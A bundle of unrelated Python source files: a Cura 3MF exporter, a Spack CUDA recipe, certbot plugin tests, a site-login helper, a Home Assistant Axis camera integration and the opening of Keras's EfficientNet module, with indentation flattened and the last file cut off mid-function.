result += str(matrix._data[1, 1]) + " "
result += str(matrix._data[2, 1]) + " "
result += str(matrix._data[0, 2]) + " "
result += str(matrix._data[1, 2]) + " "
result += str(matrix._data[2, 2]) + " "
result += str(matrix._data[0, 3]) + " "
result += str(matrix._data[1, 3]) + " "
result += str(matrix._data[2, 3])
return result
## Should we store the archive
# Note that if this is true, the archive will not be closed.
    # The object that sets this parameter is then responsible for closing it correctly!
def setStoreArchive(self, store_archive):
self._store_archive = store_archive
    ## Convenience function that converts a Uranium SceneNode object to a Savitar SceneNode.
    # \returns Savitar scene node, or None if the node is not a plain SceneNode.
def _convertUMNodeToSavitarNode(self, um_node, transformation = Matrix()):
if type(um_node) is not UM.Scene.SceneNode.SceneNode:
return None
savitar_node = Savitar.SceneNode()
node_matrix = um_node.getLocalTransformation()
matrix_string = self._convertMatrixToString(node_matrix.preMultiply(transformation))
savitar_node.setTransformation(matrix_string)
mesh_data = um_node.getMeshData()
if mesh_data is not None:
savitar_node.getMeshData().setVerticesFromBytes(mesh_data.getVerticesAsByteArray())
indices_array = mesh_data.getIndicesAsByteArray()
if indices_array is not None:
savitar_node.getMeshData().setFacesFromBytes(indices_array)
else:
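                # No index array available: treat the vertices as a triangle
                # soup and generate sequential face indices 0, 1, 2, ...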
savitar_node.getMeshData().setFacesFromBytes(numpy.arange(mesh_data.getVertices().size / 3, dtype=numpy.int32).tostring())
# Handle per object settings (if any)
stack = um_node.callDecoration("getStack")
if stack is not None:
changed_setting_keys = set(stack.getTop().getAllKeys())
# Ensure that we save the extruder used for this object.
if stack.getProperty("machine_extruder_count", "value") > 1:
changed_setting_keys.add("extruder_nr")
# Get values for all changed settings & save them.
for key in changed_setting_keys:
savitar_node.setSetting(key, str(stack.getProperty(key, "value")))
for child_node in um_node.getChildren():
savitar_child_node = self._convertUMNodeToSavitarNode(child_node)
if savitar_child_node is not None:
savitar_node.addChild(savitar_child_node)
return savitar_node
def getArchive(self):
return self._archive
def write(self, stream, nodes, mode = MeshWriter.OutputMode.BinaryMode):
self._archive = None # Reset archive
archive = zipfile.ZipFile(stream, "w", compression = zipfile.ZIP_DEFLATED)
try:
model_file = zipfile.ZipInfo("3D/3dmodel.model")
# Because zipfile is stupid and ignores archive-level compression settings when writing with ZipInfo.
model_file.compress_type = zipfile.ZIP_DEFLATED
# Create content types file
content_types_file = zipfile.ZipInfo("[Content_Types].xml")
content_types_file.compress_type = zipfile.ZIP_DEFLATED
content_types = ET.Element("Types", xmlns = self._namespaces["content-types"])
rels_type = ET.SubElement(content_types, "Default", Extension = "rels", ContentType = "application/vnd.openxmlformats-package.relationships+xml")
model_type = ET.SubElement(content_types, "Default", Extension = "model", ContentType = "application/vnd.ms-package.3dmanufacturing-3dmodel+xml")
# Create _rels/.rels file
relations_file = zipfile.ZipInfo("_rels/.rels")
relations_file.compress_type = zipfile.ZIP_DEFLATED
relations_element = ET.Element("Relationships", xmlns = self._namespaces["relationships"])
model_relation_element = ET.SubElement(relations_element, "Relationship", Target = "/3D/3dmodel.model", Id = "rel0", Type = "http://schemas.microsoft.com/3dmanufacturing/2013/01/3dmodel")
savitar_scene = Savitar.Scene()
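            # First step: Cura's scene is Y-up while 3MF is Z-up, so rotate
            # the coordinate frame to swap the Y and Z axes.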
transformation_matrix = Matrix()
transformation_matrix._data[1, 1] = 0
transformation_matrix._data[1, 2] = -1
transformation_matrix._data[2, 1] = 1
transformation_matrix._data[2, 2] = 0
global_container_stack = Application.getInstance().getGlobalContainerStack()
            # Second step: 3MF defines the left corner of the machine as center, whereas Cura uses the center of the
            # build volume.
if global_container_stack:
translation_vector = Vector(x=global_container_stack.getProperty("machine_width", "value") / 2,
y=global_container_stack.getProperty("machine_depth", "value") / 2,
z=0)
translation_matrix = Matrix()
translation_matrix.setByTranslation(translation_vector)
transformation_matrix.preMultiply(translation_matrix)
root_node = UM.Application.Application.getInstance().getController().getScene().getRoot()
for node in nodes:
if node == root_node:
for root_child in node.getChildren():
savitar_node = self._convertUMNodeToSavitarNode(root_child, transformation_matrix)
if savitar_node:
savitar_scene.addSceneNode(savitar_node)
else:
savitar_node = self._convertUMNodeToSavitarNode(node, transformation_matrix)
if savitar_node:
savitar_scene.addSceneNode(savitar_node)
parser = Savitar.ThreeMFParser()
scene_string = parser.sceneToString(savitar_scene)
archive.writestr(model_file, scene_string)
archive.writestr(content_types_file, b'<?xml version="1.0" encoding="UTF-8"?> \n' + ET.tostring(content_types))
archive.writestr(relations_file, b'<?xml version="1.0" encoding="UTF-8"?> \n' + ET.tostring(relations_element))
except Exception as e:
Logger.logException("e", "Error writing zip file")
return False
finally:
if not self._store_archive:
archive.close()
else:
self._archive = archive
return True
|
import exporter
import dataset_export
import update_datastore_content #enter key as an argument
from sys import argv
script, env, res_id, api_key = argv
with open(env + '.csv', 'w') as f:
csv_string = exporter.export('https://' + env + '.data.gov.bc.ca', 'columns.json')
f.write(csv_string)
if __name__ == '__main__':
dataset_export.export_type(env)
update_datastore_content.update_resource(env, res_id, api_key)
|
from spack import *
from glob import glob
class Cuda(Package):
"""CUDA is a parallel computing platform and programming model invented
by NVIDIA. It enables dramatic increases in computing performance by
harnessing the power of the graphics processing unit (GPU).
Note: This package does not currently install the drivers necessary
to run CUDA. These will need to be installed manually. See:
https://docs.nvidia.com/cuda/ for details."""
homepage = "https://developer.nvidia.com/cuda-zone"
version('9.2.88', 'dd6e33e10d32a29914b7700c7b3d1ca0', expand=False,
url="https://developer.nvidia.com/compute/cuda/9.2/Prod/local_installers/cuda_9.2.88_396.26_linux")
version('9.1.85', '67a5c3933109507df6b68f80650b4b4a', expand=False,
url="https://developer.nvidia.com/compute/cuda/9.1/Prod/local_installers/cuda_9.1.85_387.26_linux")
version('9.0.176', '7a00187b2ce5c5e350e68882f42dd507', expand=False,
url="https://developer.nvidia.com/compute/cuda/9.0/Prod/local_installers/cuda_9.0.176_384.81_linux-run")
version('8.0.61', '33e1bd980e91af4e55f3ef835c103f9b', expand=False,
url="https://developer.nvidia.com/compute/cuda/8.0/Prod2/local_installers/cuda_8.0.61_375.26_linux-run")
version('8.0.44', '6dca912f9b7e2b7569b0074a41713640', expand=False,
url="https://developer.nvidia.com/compute/cuda/8.0/prod/local_installers/cuda_8.0.44_linux-run")
version('7.5.18', '4b3bcecf0dfc35928a0898793cf3e4c6', expand=False,
url="http://developer.download.nvidia.com/compute/cuda/7.5/Prod/local_installers/cuda_7.5.18_linux.run")
version('6.5.14', '90b1b8f77313600cc294d9271741f4da', expand=False,
url="http://developer.download.nvidia.com/compute/cuda/6_5/rel/installers/cuda_6.5.14_linux_64.run")
def install(self, spec, prefix):
runfile = glob(join_path(self.stage.path, 'cuda*_linux*'))[0]
chmod = which('chmod')
chmod('+x', runfile)
runfile = which(runfile)
# Note: NVIDIA does not officially support many newer versions of
# compilers. For example, on CentOS 6, you must use GCC 4.4.7 or
# older. See:
# http://docs.nvidia.com/cuda/cuda-installation-guide-linux/#system-requirements
# https://gist.github.com/ax3l/9489132
# for details.
runfile(
'--silent', # disable interactive prompts
'--verbose', # create verbose log file
'--override', # override compiler version checks
'--toolkit', # install CUDA Toolkit
'--toolkitpath=%s' % prefix
)
|
from ming import *
import sys
srcdir=sys.argv[1]
m = SWFMovie()
font = SWFFont(srcdir + "/../Media/test.ttf")
text = SWFText(1)
w = font.getStringWidth("The quick brown fox jumps over the lazy dog. 1234567890")
text.setFont(font)
text.setColor(0,0,0,255)
text.setHeight(20)
text.moveTo(w,0)
text.addString("|")
m.add(text)
m.nextFrame()
m.save("test03.swf")
|
"""Tests for certbot.plugins.disco."""
import unittest
import mock
import pkg_resources
import zope.interface
from certbot import errors
from certbot import interfaces
from certbot.plugins import standalone
from certbot.plugins import webroot
EP_SA = pkg_resources.EntryPoint(
"sa", "certbot.plugins.standalone",
attrs=("Authenticator",),
dist=mock.MagicMock(key="certbot"))
EP_WR = pkg_resources.EntryPoint(
"wr", "certbot.plugins.webroot",
attrs=("Authenticator",),
dist=mock.MagicMock(key="certbot"))
class PluginEntryPointTest(unittest.TestCase):
"""Tests for certbot.plugins.disco.PluginEntryPoint."""
def setUp(self):
self.ep1 = pkg_resources.EntryPoint(
"ep1", "p1.ep1", dist=mock.MagicMock(key="p1"))
self.ep1prim = pkg_resources.EntryPoint(
"ep1", "p2.ep2", dist=mock.MagicMock(key="p2"))
# nested
self.ep2 = pkg_resources.EntryPoint(
"ep2", "p2.foo.ep2", dist=mock.MagicMock(key="p2"))
# project name != top-level package name
self.ep3 = pkg_resources.EntryPoint(
"ep3", "a.ep3", dist=mock.MagicMock(key="p3"))
from certbot.plugins.disco import PluginEntryPoint
self.plugin_ep = PluginEntryPoint(EP_SA)
def test_entry_point_to_plugin_name(self):
from certbot.plugins.disco import PluginEntryPoint
names = {
self.ep1: "p1:ep1",
self.ep1prim: "p2:ep1",
self.ep2: "p2:ep2",
self.ep3: "p3:ep3",
EP_SA: "sa",
}
for entry_point, name in names.iteritems():
self.assertEqual(
name, PluginEntryPoint.entry_point_to_plugin_name(entry_point))
def test_description(self):
self.assertEqual(
"Automatically use a temporary webserver",
self.plugin_ep.description)
def test_description_with_name(self):
self.plugin_ep.plugin_cls = mock.MagicMock(description="Desc")
self.assertEqual(
"Desc (sa)", self.plugin_ep.description_with_name)
def test_ifaces(self):
self.assertTrue(self.plugin_ep.ifaces((interfaces.IAuthenticator,)))
self.assertFalse(self.plugin_ep.ifaces((interfaces.IInstaller,)))
self.assertFalse(self.plugin_ep.ifaces((
interfaces.IInstaller, interfaces.IAuthenticator)))
def test__init__(self):
self.assertFalse(self.plugin_ep.initialized)
self.assertFalse(self.plugin_ep.prepared)
self.assertFalse(self.plugin_ep.misconfigured)
self.assertFalse(self.plugin_ep.available)
self.assertTrue(self.plugin_ep.problem is None)
self.assertTrue(self.plugin_ep.entry_point is EP_SA)
self.assertEqual("sa", self.plugin_ep.name)
self.assertTrue(self.plugin_ep.plugin_cls is standalone.Authenticator)
def test_init(self):
config = mock.MagicMock()
plugin = self.plugin_ep.init(config=config)
self.assertTrue(self.plugin_ep.initialized)
self.assertTrue(plugin.config is config)
# memoize!
self.assertTrue(self.plugin_ep.init() is plugin)
self.assertTrue(plugin.config is config)
# try to give different config
self.assertTrue(self.plugin_ep.init(123) is plugin)
self.assertTrue(plugin.config is config)
self.assertFalse(self.plugin_ep.prepared)
self.assertFalse(self.plugin_ep.misconfigured)
self.assertFalse(self.plugin_ep.available)
def test_verify(self):
iface1 = mock.MagicMock(__name__="iface1")
iface2 = mock.MagicMock(__name__="iface2")
iface3 = mock.MagicMock(__name__="iface3")
# pylint: disable=protected-access
self.plugin_ep._initialized = plugin = mock.MagicMock()
exceptions = zope.interface.exceptions
with mock.patch("certbot.plugins."
"disco.zope.interface") as mock_zope:
mock_zope.exceptions = exceptions
def verify_object(iface, obj): # pylint: disable=missing-docstring
assert obj is plugin
assert iface is iface1 or iface is iface2 or iface is iface3
if iface is iface3:
raise mock_zope.exceptions.BrokenImplementation(None, None)
mock_zope.verify.verifyObject.side_effect = verify_object
self.assertTrue(self.plugin_ep.verify((iface1,)))
self.assertTrue(self.plugin_ep.verify((iface1, iface2)))
self.assertFalse(self.plugin_ep.verify((iface3,)))
self.assertFalse(self.plugin_ep.verify((iface1, iface3)))
def test_prepare(self):
config = mock.MagicMock()
self.plugin_ep.init(config=config)
self.plugin_ep.prepare()
self.assertTrue(self.plugin_ep.prepared)
self.assertFalse(self.plugin_ep.misconfigured)
# output doesn't matter that much, just test if it runs
str(self.plugin_ep)
def test_prepare_misconfigured(self):
plugin = mock.MagicMock()
plugin.prepare.side_effect = errors.MisconfigurationError
# pylint: disable=protected-access
self.plugin_ep._initialized = plugin
self.assertTrue(isinstance(self.plugin_ep.prepare(),
errors.MisconfigurationError))
self.assertTrue(self.plugin_ep.prepared)
self.assertTrue(self.plugin_ep.misconfigured)
self.assertTrue(isinstance(self.plugin_ep.problem,
errors.MisconfigurationError))
self.assertTrue(self.plugin_ep.available)
def test_prepare_no_installation(self):
plugin = mock.MagicMock()
plugin.prepare.side_effect = errors.NoInstallationError
# pylint: disable=protected-access
self.plugin_ep._initialized = plugin
self.assertTrue(isinstance(self.plugin_ep.prepare(),
errors.NoInstallationError))
self.assertTrue(self.plugin_ep.prepared)
self.assertFalse(self.plugin_ep.misconfigured)
self.assertFalse(self.plugin_ep.available)
def test_prepare_generic_plugin_error(self):
plugin = mock.MagicMock()
plugin.prepare.side_effect = errors.PluginError
# pylint: disable=protected-access
self.plugin_ep._initialized = plugin
self.assertTrue(isinstance(self.plugin_ep.prepare(), errors.PluginError))
self.assertTrue(self.plugin_ep.prepared)
self.assertFalse(self.plugin_ep.misconfigured)
self.assertFalse(self.plugin_ep.available)
def test_repr(self):
self.assertEqual("PluginEntryPoint#sa", repr(self.plugin_ep))
class PluginsRegistryTest(unittest.TestCase):
"""Tests for certbot.plugins.disco.PluginsRegistry."""
def setUp(self):
from certbot.plugins.disco import PluginsRegistry
self.plugin_ep = mock.MagicMock(name="mock")
self.plugin_ep.__hash__.side_effect = TypeError
self.plugins = {"mock": self.plugin_ep}
self.reg = PluginsRegistry(self.plugins)
def test_find_all(self):
from certbot.plugins.disco import PluginsRegistry
with mock.patch("certbot.plugins.disco.pkg_resources") as mock_pkg:
mock_pkg.iter_entry_points.side_effect = [iter([EP_SA]),
iter([EP_WR])]
plugins = PluginsRegistry.find_all()
self.assertTrue(plugins["sa"].plugin_cls is standalone.Authenticator)
self.assertTrue(plugins["sa"].entry_point is EP_SA)
self.assertTrue(plugins["wr"].plugin_cls is webroot.Authenticator)
self.assertTrue(plugins["wr"].entry_point is EP_WR)
def test_getitem(self):
self.assertEqual(self.plugin_ep, self.reg["mock"])
def test_iter(self):
self.assertEqual(["mock"], list(self.reg))
def test_len(self):
self.assertEqual(1, len(self.reg))
self.plugins.clear()
self.assertEqual(0, len(self.reg))
def test_init(self):
self.plugin_ep.init.return_value = "baz"
self.assertEqual(["baz"], self.reg.init("bar"))
self.plugin_ep.init.assert_called_once_with("bar")
def test_filter(self):
self.plugins.update({
"foo": "bar",
"bar": "foo",
"baz": "boo",
})
self.assertEqual(
{"foo": "bar", "baz": "boo"},
self.reg.filter(lambda p_ep: str(p_ep).startswith("b")))
def test_ifaces(self):
self.plugin_ep.ifaces.return_value = True
# pylint: disable=protected-access
self.assertEqual(self.plugins, self.reg.ifaces()._plugins)
self.plugin_ep.ifaces.return_value = False
self.assertEqual({}, self.reg.ifaces()._plugins)
def test_verify(self):
self.plugin_ep.verify.return_value = True
# pylint: disable=protected-access
self.assertEqual(
self.plugins, self.reg.verify(mock.MagicMock())._plugins)
self.plugin_ep.verify.return_value = False
self.assertEqual({}, self.reg.verify(mock.MagicMock())._plugins)
def test_prepare(self):
self.plugin_ep.prepare.return_value = "baz"
self.assertEqual(["baz"], self.reg.prepare())
self.plugin_ep.prepare.assert_called_once_with()
def test_available(self):
self.plugin_ep.available = True
# pylint: disable=protected-access
self.assertEqual(self.plugins, self.reg.available()._plugins)
self.plugin_ep.available = False
self.assertEqual({}, self.reg.available()._plugins)
def test_find_init(self):
self.assertTrue(self.reg.find_init(mock.Mock()) is None)
        self.plugin_ep.initialized = True
self.assertTrue(
self.reg.find_init(self.plugin_ep.init()) is self.plugin_ep)
def test_repr(self):
self.plugin_ep.__repr__ = lambda _: "PluginEntryPoint#mock"
self.assertEqual("PluginsRegistry(PluginEntryPoint#mock)",
repr(self.reg))
def test_str(self):
self.plugin_ep.__str__ = lambda _: "Mock"
self.plugins["foo"] = "Mock"
self.assertEqual("Mock\n\nMock", str(self.reg))
self.plugins.clear()
self.assertEqual("No plugins", str(self.reg))
if __name__ == "__main__":
unittest.main() # pragma: no cover
|
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers
import urllib2,urllib,sys,time
import cookielib,mechanize
import re
DEBUG = 0
reload(sys)
sys.setdefaultencoding('utf8') #@UndefinedVariable
register_openers()
headers = {
'Host':'agent.anjuke.com',
'User-Agent' : 'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
#'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
#'Accept-Language':'zh-cn,zh;q=0.5',
#'Accept-Encoding':'gzip, deflate',
#'Accept-Charset':'GB2312,utf-8;q=0.7,*;q=0.7',
'Keep-Alive':'115',
'Connection':'keep-alive',
}
class httpPost():
data = {}
def __init__(self,dataDic):
self.cookie = cookielib.CookieJar()
httpsHandler = urllib2.HTTPHandler()
httpsHandler.set_http_debuglevel(DEBUG)
self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie),httpsHandler)
self.data = dataDic
def login1(self):
self.brow = mechanize.Browser()
httpHandler = mechanize.HTTPHandler()
httpsHandler = mechanize.HTTPSHandler()
httpHandler.set_http_debuglevel(DEBUG)
self.cookiejar = mechanize.LWPCookieJar()
#self.cookiejar = "Cookie lzstat_uv=34741959842666604402|1786789; Hm_lvt_976797cb85805d626fc5642aa5244ba0=1304534271541; ASPSESSIONIDQCDRAQBB=JHCHINLAHGMAIGBIFMNANLGF; lzstat_ss=2189193215_2_1304564199_1786789; Hm_lpvt_976797cb85805d626fc5642aa5244ba0=1304535401191"
self.opener = mechanize.OpenerFactory(mechanize.SeekableResponseOpener).build_opener(
httpHandler,httpsHandler,
mechanize.HTTPCookieProcessor(self.cookiejar),
mechanize.HTTPRefererProcessor,
mechanize.HTTPEquivProcessor,
mechanize.HTTPRefreshProcessor,
)
self.opener.addheaders = [("User-Agent","Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13"),
("From", "")]
#self.opener.addheaders = [(
# "Referer", self.data['postUrl']
# )]
login={}
login['method'] = self.data['method']
login['name'] = self.data['name']
login['pwd'] = self.data['pwd']
loginUrl = self.data['loginUrl']+'?'+urllib.urlencode(login)
print loginUrl
response = mechanize.urlopen("http://esf.soufun.com/")
response = mechanize.urlopen(loginUrl)
print response.read().decode('gb2312')
def login(self):
self.cookie = cookielib.CookieJar()
httpsHandler = urllib2.HTTPHandler()
httpsHandler.set_http_debuglevel(DEBUG)
self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie),httpsHandler)
login={}
login['act'] = self.data['act']
login['loginName'] = self.data['loginName']
login['history'] = ''
login['loginPasswd'] = self.data['loginPasswd']
loginUrl = self.data['loginUrl']
req = urllib2.Request(loginUrl,urllib.urlencode(login),headers)
r = self.opener.open(req)
res = None
for item in self.cookie:
#print item.name,item.value
if item.name == 'aQQ_ajklastuser':
res = item.value
return res
#aQQ_ajklastuser junyue_liuhua
#print self.opener.open('http://my.anjuke.com/v2/user/broker/checked/').read()
#open('login.txt','w').write(r.read().encode('utf-8'))
def post(self):
pass
|
from aquilon.worker.broker import BrokerCommand # pylint: disable=W0611
from aquilon.worker.commands.show_hostlink import CommandShowHostlink
class CommandShowHostlinkHostlink(CommandShowHostlink):
required_parameters = ["hostlink"]
|
import sqlalchemy
def upgrade(migrate_engine):
meta = sqlalchemy.MetaData(bind=migrate_engine)
stack = sqlalchemy.Table('stack', meta, autoload=True)
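    # mysql_length limits the MySQL index prefix; owner_id holds 36-character
    # values (UUIDs), so index exactly that many characters.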
name_index = sqlalchemy.Index('ix_stack_owner_id', stack.c.owner_id,
mysql_length=36)
name_index.create(migrate_engine)
|
"""Support for Axis camera streaming."""
from homeassistant.components.camera import SUPPORT_STREAM
from homeassistant.components.mjpeg.camera import (
CONF_MJPEG_URL,
CONF_STILL_IMAGE_URL,
MjpegCamera,
filter_urllib3_logging,
)
from homeassistant.const import (
CONF_AUTHENTICATION,
CONF_DEVICE,
CONF_HOST,
CONF_MAC,
CONF_NAME,
CONF_PASSWORD,
CONF_PORT,
CONF_USERNAME,
HTTP_DIGEST_AUTHENTICATION,
)
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from .axis_base import AxisEntityBase
from .const import DOMAIN as AXIS_DOMAIN
AXIS_IMAGE = "http://{}:{}/axis-cgi/jpg/image.cgi"
AXIS_VIDEO = "http://{}:{}/axis-cgi/mjpg/video.cgi"
AXIS_STREAM = "rtsp://{}:{}@{}/axis-media/media.amp?videocodec=h264"
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the Axis camera video stream."""
filter_urllib3_logging()
serial_number = config_entry.data[CONF_MAC]
device = hass.data[AXIS_DOMAIN][serial_number]
config = {
CONF_NAME: config_entry.data[CONF_NAME],
CONF_USERNAME: config_entry.data[CONF_DEVICE][CONF_USERNAME],
CONF_PASSWORD: config_entry.data[CONF_DEVICE][CONF_PASSWORD],
CONF_MJPEG_URL: AXIS_VIDEO.format(
config_entry.data[CONF_DEVICE][CONF_HOST],
config_entry.data[CONF_DEVICE][CONF_PORT],
),
CONF_STILL_IMAGE_URL: AXIS_IMAGE.format(
config_entry.data[CONF_DEVICE][CONF_HOST],
config_entry.data[CONF_DEVICE][CONF_PORT],
),
CONF_AUTHENTICATION: HTTP_DIGEST_AUTHENTICATION,
}
async_add_entities([AxisCamera(config, device)])
class AxisCamera(AxisEntityBase, MjpegCamera):
"""Representation of a Axis camera."""
def __init__(self, config, device):
"""Initialize Axis Communications camera component."""
AxisEntityBase.__init__(self, device)
MjpegCamera.__init__(self, config)
async def async_added_to_hass(self):
"""Subscribe camera events."""
self.unsub_dispatcher.append(
async_dispatcher_connect(
self.hass, self.device.event_new_address, self._new_address
)
)
await super().async_added_to_hass()
@property
def supported_features(self):
"""Return supported features."""
return SUPPORT_STREAM
async def stream_source(self):
"""Return the stream source."""
return AXIS_STREAM.format(
self.device.config_entry.data[CONF_DEVICE][CONF_USERNAME],
self.device.config_entry.data[CONF_DEVICE][CONF_PASSWORD],
self.device.host,
)
def _new_address(self):
"""Set new device address for video stream."""
port = self.device.config_entry.data[CONF_DEVICE][CONF_PORT]
self._mjpeg_url = AXIS_VIDEO.format(self.device.host, port)
self._still_image_url = AXIS_IMAGE.format(self.device.host, port)
@property
def unique_id(self):
"""Return a unique identifier for this device."""
return f"{self.device.serial}-camera"
|
"""EfficientNet models for Keras.
Reference:
- [EfficientNet: Rethinking Model Scaling for Convolutional Neural Networks](
https://arxiv.org/abs/1905.11946) (ICML 2019)
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import math
from tensorflow.python.keras import backend
from tensorflow.python.keras.applications import imagenet_utils
from tensorflow.python.keras.engine import training
from tensorflow.python.keras.layers import VersionAwareLayers
from tensorflow.python.keras.utils import data_utils
from tensorflow.python.keras.utils import layer_utils
from tensorflow.python.lib.io import file_io
from tensorflow.python.util.tf_export import keras_export
BASE_WEIGHTS_PATH = 'https://storage.googleapis.com/keras-applications/'
WEIGHTS_HASHES = {
'b0': ('902e53a9f72be733fc0bcb005b3ebbac',
'50bc09e76180e00e4465e1a485ddc09d'),
'b1': ('1d254153d4ab51201f1646940f018540',
'74c4e6b3e1f6a1eea24c589628592432'),
'b2': ('b15cce36ff4dcbd00b6dd88e7857a6ad',
'111f8e2ac8aa800a7a99e3239f7bfb39'),
'b3': ('ffd1fdc53d0ce67064dc6a9c7960ede0',
'af6d107764bb5b1abb91932881670226'),
'b4': ('18c95ad55216b8f92d7e70b3a046e2fc',
'ebc24e6d6c33eaebbd558eafbeedf1ba'),
'b5': ('ace28f2a6363774853a83a0b21b9421a',
'38879255a25d3c92d5e44e04ae6cec6f'),
'b6': ('165f6e37dce68623721b423839de8be5',
'9ecce42647a20130c1f39a5d4cb75743'),
'b7': ('8c03f828fec3ef71311cd463b6759d99',
'cbcfe4450ddf6f3ad90b1b398090fe4a'),
}
DEFAULT_BLOCKS_ARGS = [{
'kernel_size': 3,
'repeats': 1,
'filters_in': 32,
'filters_out': 16,
'expand_ratio': 1,
'id_skip': True,
'strides': 1,
'se_ratio': 0.25
}, {
'kernel_size': 3,
'repeats': 2,
'filters_in': 16,
'filters_out': 24,
'expand_ratio': 6,
'id_skip': True,
'strides': 2,
'se_ratio': 0.25
}, {
'kernel_size': 5,
'repeats': 2,
'filters_in': 24,
'filters_out': 40,
'expand_ratio': 6,
'id_skip': True,
'strides': 2,
'se_ratio': 0.25
}, {
'kernel_size': 3,
'repeats': 3,
'filters_in': 40,
'filters_out': 80,
'expand_ratio': 6,
'id_skip': True,
'strides': 2,
'se_ratio': 0.25
}, {
'kernel_size': 5,
'repeats': 3,
'filters_in': 80,
'filters_out': 112,
'expand_ratio': 6,
'id_skip': True,
'strides': 1,
'se_ratio': 0.25
}, {
'kernel_size': 5,
'repeats': 4,
'filters_in': 112,
'filters_out': 192,
'expand_ratio': 6,
'id_skip': True,
'strides': 2,
'se_ratio': 0.25
}, {
'kernel_size': 3,
'repeats': 1,
'filters_in': 192,
'filters_out': 320,
'expand_ratio': 6,
'id_skip': True,
'strides': 1,
'se_ratio': 0.25
}]
CONV_KERNEL_INITIALIZER = {
'class_name': 'VarianceScaling',
'config': {
'scale': 2.0,
'mode': 'fan_out',
'distribution': 'truncated_normal'
}
}
DENSE_KERNEL_INITIALIZER = {
'class_name': 'VarianceScaling',
'config': {
'scale': 1. / 3.,
'mode': 'fan_out',
'distribution': 'uniform'
}
}
layers = VersionAwareLayers()
BASE_DOCSTRING = """Instantiates the {name} architecture.
Reference:
- [EfficientNet: Rethinking Model Scaling for Convolutional Neural Networks](
https://arxiv.org/abs/1905.11946) (ICML 2019)
Optionally loads weights pre-trained on ImageNet.
Note that the data format convention used by the model is
the one specified in your Keras config at `~/.keras/keras.json`.
If you have never configured it, it defaults to `"channels_last"`.
Arguments:
include_top: Whether to include the fully-connected
layer at the top of the network. Defaults to True.
weights: One of `None` (random initialization),
'imagenet' (pre-training on ImageNet),
or the path to the weights file to be loaded. Defaults to 'imagenet'.
input_tensor: Optional Keras tensor
(i.e. output of `layers.Input()`)
to use as image input for the model.
input_shape: Optional shape tuple, only to be specified
if `include_top` is False.
      It should have exactly 3 input channels.
pooling: Optional pooling mode for feature extraction
when `include_top` is `False`. Defaults to None.
- `None` means that the output of the model will be
the 4D tensor output of the
last convolutional layer.
- `avg` means that global average pooling
will be applied to the output of the
last convolutional layer, and thus
the output of the model will be a 2D tensor.
- `max` means that global max pooling will
be applied.
classes: Optional number of classes to classify images
into, only to be specified if `include_top` is True, and
if no `weights` argument is specified. Defaults to 1000 (number of
ImageNet classes).
classifier_activation: A `str` or callable. The activation function to use
on the "top" layer. Ignored unless `include_top=True`. Set
`classifier_activation=None` to return the logits of the "top" layer.
Defaults to 'softmax'.
Returns:
A `keras.Model` instance.
"""
def EfficientNet(
width_coefficient,
depth_coefficient,
default_size,
dropout_rate=0.2,
drop_connect_rate=0.2,
depth_divisor=8,
activation='swish',
blocks_args='default',
model_name='efficientnet',
include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
classifier_activation='softmax'):
"""Instantiates the EfficientNet architecture using given scaling coefficients.
Reference:
- [EfficientNet: Rethinking Model Scaling for Convolutional Neural Networks](
https://arxiv.org/abs/1905.11946) (ICML 2019)
Optionally loads weights pre-trained on ImageNet.
Note that the data format convention used by the model is
the one specified in your Keras config at `~/.keras/keras.json`.
Arguments:
width_coefficient: float, scaling coefficient for network width.
depth_coefficient: float, scaling coefficient for network depth.
default_size: integer, default input image size.
dropout_rate: float, dropout rate before final classifier layer.
drop_connect_rate: float, dropout rate at skip connections.
depth_divisor: integer, a unit of network width.
activation: activation function.
blocks_args: list of dicts, parameters to construct block modules.
model_name: string, model name.
include_top: whether to include the fully-connected
layer at the top of the network.
weights: one of `None` (random initialization),
'imagenet' (pre-training on ImageNet),
or the path to the weights file to be loaded.
input_tensor: optional Keras tensor
(i.e. output of `layers.Input()`)
to use as image input for the model.
input_shape: optional shape tuple, only to be specified
if `include_top` is False.
      It should have exactly 3 input channels.
pooling: optional pooling mode for feature extraction
when `include_top` is `False`.
- `None` means that the output of the model will be
the 4D tensor output of the
last convolutional layer.
- `avg` means that global average pooling
will be applied to the output of the
last convolutional layer, and thus
the output of the model will be a 2D tensor.
- `max` means that global max pooling will
be applied.
classes: optional number of classes to classify images
into, only to be specified if `include_top` is True, and
if no `weights` argument is specified.
classifier_activation: A `str` or callable. The activation function to use
on the "top" layer. Ignored unless `include_top=True`. Set
`classifier_activation=None` to return the logits of the "top" layer.
Returns:
A `keras.Model` instance.
Raises:
ValueError: in case of invalid argument for `weights`,
or invalid input shape.
ValueError: if `classifier_activation` is not `softmax` or `None` when
using a pretrained top layer.
"""
if blocks_args == 'default':
blocks_args = DEFAULT_BLOCKS_ARGS
if not (weights in {'imagenet', None} or file_io.file_exists_v2(weights)):
raise ValueError('The `weights` argument should be either '
'`None` (random initialization), `imagenet` '
'(pre-training on ImageNet), '
'or the path to the weights file to be loaded.')
if weights == 'imagenet' and include_top and classes != 1000:
raise ValueError('If using `weights` as `"imagenet"` with `include_top`'
' as true, `classes` should be 1000')
# Determine proper input shape
input_shape = imagenet_utils.obtain_input_shape(
input_shape,
default_size=default_size,
min_size=32,
data_format=backend.image_data_format(),
require_flatten=include_top,
weights=weights)
if input_tensor is None:
img_input = layers.Input(shape=input_shape)
else:
if not backend.is_keras_tensor(input_tensor):
img_input = layers.Input(tensor=input_tensor, shape=input_shape)
else:
img_input = input_tensor
bn_axis = 3 if backend.image_data_format() == 'channels_last' else 1
def round_filters(filters, divisor=depth_divisor):
"""Round number of filters based on depth multiplier."""
filters *= width_coefficient
new_filters = max(divisor, int(filters + divisor / 2) // divisor * divisor)
# Make sure that round down does not go down by more than 10%.
if new_filters < 0.9 * filters:
new_filters += divisor
return int(new_filters)
def round_repeats(repeats):
"""Round number of repeats based on depth multiplier."""
return int(math.ceil(depth_coefficient * repeats))
# Build stem
x = img_input
